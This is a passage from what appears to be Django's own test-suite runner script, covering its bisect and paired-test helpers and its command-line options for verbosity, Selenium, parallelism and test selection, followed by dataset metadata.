break
if len(test_labels) == 1:
print("***** Source of error: %s" % test_labels[0])
teardown(state)
def paired_tests(paired_test, options, test_labels, parallel, start_at, start_after):
state = setup(options.verbosity, test_labels, parallel, start_at, start_after)
test_labels = test_labels or get_installed()
print('***** Trying paired execution')
# Make sure the constant member of the pair isn't in the test list
# Also remove tests that need to be run in specific combinations
for label in [paired_test, 'model_inheritance_same_model_name']:
try:
test_labels.remove(label)
except ValueError:
pass
subprocess_args = get_subprocess_args(options)
for i, label in enumerate(test_labels):
print('***** %d of %d: Check test pairing with %s' % (
i + 1, len(test_labels), label))
failures = subprocess.call(subprocess_args + [label, paired_test])
if failures:
print('***** Found problem pair with %s' % label)
return
print('***** No problem pair found')
teardown(state)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Run the Django test suite.")
parser.add_argument(
'modules', nargs='*', metavar='module',
help='Optional path(s) to test modules; e.g. "i18n" or '
'"i18n.tests.TranslationTests.test_lazy_objects".',
)
parser.add_argument(
'-v', '--verbosity', default=1, type=int, choices=[0, 1, 2, 3],
help='Verbosity level; 0=minimal output, 1=normal output, 2=all output',
)
parser.add_argument(
'--noinput', action='store_false', dest='interactive',
help='Tells Django to NOT prompt the user for input of any kind.',
)
parser.add_argument(
'--failfast', action='store_true',
help='Tells Django to stop running the test suite after first failed test.',
)
parser.add_argument(
'--keepdb', action='store_true',
help='Tells Django to preserve the test database between runs.',
)
parser.add_argument(
'--settings',
help='Python path to settings module, e.g. "myproject.settings". If '
'this isn\'t provided, either the DJANGO_SETTINGS_MODULE '
'environment variable or "test_sqlite" will be used.',
)
parser.add_argument(
'--bisect',
help='Bisect the test suite to discover a test that causes a test '
'failure when combined with the named test.',
)
parser.add_argument(
'--pair',
help='Run the test suite in pairs with the named test to find problem pairs.',
)
parser.add_argument(
'--reverse', action='store_true',
help='Sort test suites and test cases in opposite order to debug '
'test side effects not apparent with normal execution lineup.',
)
parser.add_argument(
'--selenium', action=ActionSelenium, metavar='BROWSERS',
help='A comma-separated list of browsers to run the Selenium tests against.',
)
parser.add_argument(
'--headless', action='store_true',
help='Run selenium tests in headless mode, if the browser supports the option.',
)
parser.add_argument(
'--selenium-hub',
help='A URL for a selenium hub instance to use in combination with --selenium.',
)
parser.add_argument(
'--external-host', default=socket.gethostname(),
help='The external host that can be reached by the selenium hub instance when running Selenium '
'tests via Selenium Hub.',
)
parser.add_argument(
'--debug-sql', action='store_true',
help='Turn on the SQL query logger within tests.',
)
parser.add_argument(
'--parallel', nargs='?', default=0, type=int,
const=default_test_processes(), metavar='N',
help='Run tests using up to N parallel processes.',
)
parser.add_argument(
'--tag', dest='tags', action='append',
help='Run only tests with the specified tags. Can be used multiple times.',
)
parser.add_argument(
'--exclude-tag', dest='exclude_tags', action='append',
help='Do not run tests with the specified tag. Can be used multiple times.',
)
parser.add_argument(
'--start-after', dest='start_after',
help='Run tests starting after the specified top-level module.',
)
parser.add_argument(
'--start-at', dest='start_at',
help='Run tests starting at the specified top-level module.',
)
parser.add_argument(
'--pdb', action='store_true',
help='Runs the PDB debugger on error or failure.'
)
parser.add_argument(
'-b', '--buffer', action='store_true',
help='Discard output of passing tests.',
)
parser.add_argument(
'--timing', action='store_true',
help='Output timings, including database set up and total run time.',
)
if PY37:
parser.add_argument(
'-k', dest='test_name_patterns', action='append',
help=(
'Only run test methods and classes matching test name pattern. '
'Same as unittest -k option. Can be used multiple times.'
),
)
options = parser.parse_args()
using_selenium_hub = options.selenium and options.selenium_hub
if options.selenium_hub and not options.selenium:
parser.error('--selenium-hub and --external-host require --selenium to be used.')
if using_selenium_hub and not options.external_host:
parser.error('--selenium-hub and --external-host must be used together.')
# Allow including a trailing slash on app_labels for tab completion convenience
options.modules = [os.path.normpath(labels) for labels in options.modules]
mutually_exclusive_options = [options.start_at, options.start_after, options.modules]
enabled_module_options = [bool(option) for option in mutually_exclusive_options].count(True)
if enabled_module_options > 1:
print('Aborting: --start-at, --start-after, and test labels are mutually exclusive.')
sys.exit(1)
for opt_name in ['start_at', 'start_after']:
opt_val = getattr(options, opt_name)
if opt_val:
if '.' in opt_val:
print('Aborting: --%s must be a top-level module.' % opt_name.replace('_', '-'))
sys.exit(1)
setattr(options, opt_name, os.path.normpath(opt_val))
if options.settings:
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
else:
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'test_sqlite')
options.settings = os.environ['DJANGO_SETTINGS_MODULE']
if options.selenium:
if not options.tags:
options.tags = ['selenium']
elif 'selenium' not in options.tags:
options.tags.append('selenium')
if options.selenium_hub:
SeleniumTestCaseBase.selenium_hub = options.selenium_hub
SeleniumTestCaseBase.external_host = options.external_host
SeleniumTestCaseBase.headless = options.headless
SeleniumTestCaseBase.browsers = options.selenium
if options.bisect:
bisect_tests(
options.bisect, options, options.modules, options.parallel,
options.start_at, options.start_after,
)
elif options.pair:
paired_tests(
options.pair, options, options.modules, options.parallel,
options.start_at, options.start_after,
)
else:
time_keeper = TimeKeeper() if options.timing else NullTimeKeeper()
with time_keeper.timed('Total run'):
failures = django_tests(
options.verbosity, options.interactive, options.failfast,
options.keepdb, options.reverse, options.modules,
options.debug_sql, options.parallel, options.tags,
options.exclude_tags,
getattr(options, 'test_name_patterns', None),
options.start_at, options.start_after, options.pdb, options.buffer,
options.timing,
)
time_keeper.print_results()
if failures:
sys.exit(1)
| bsd-3-clause | -6,603,682,544,696,628,000 | 37.510033 | 113 | 0.642755 | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.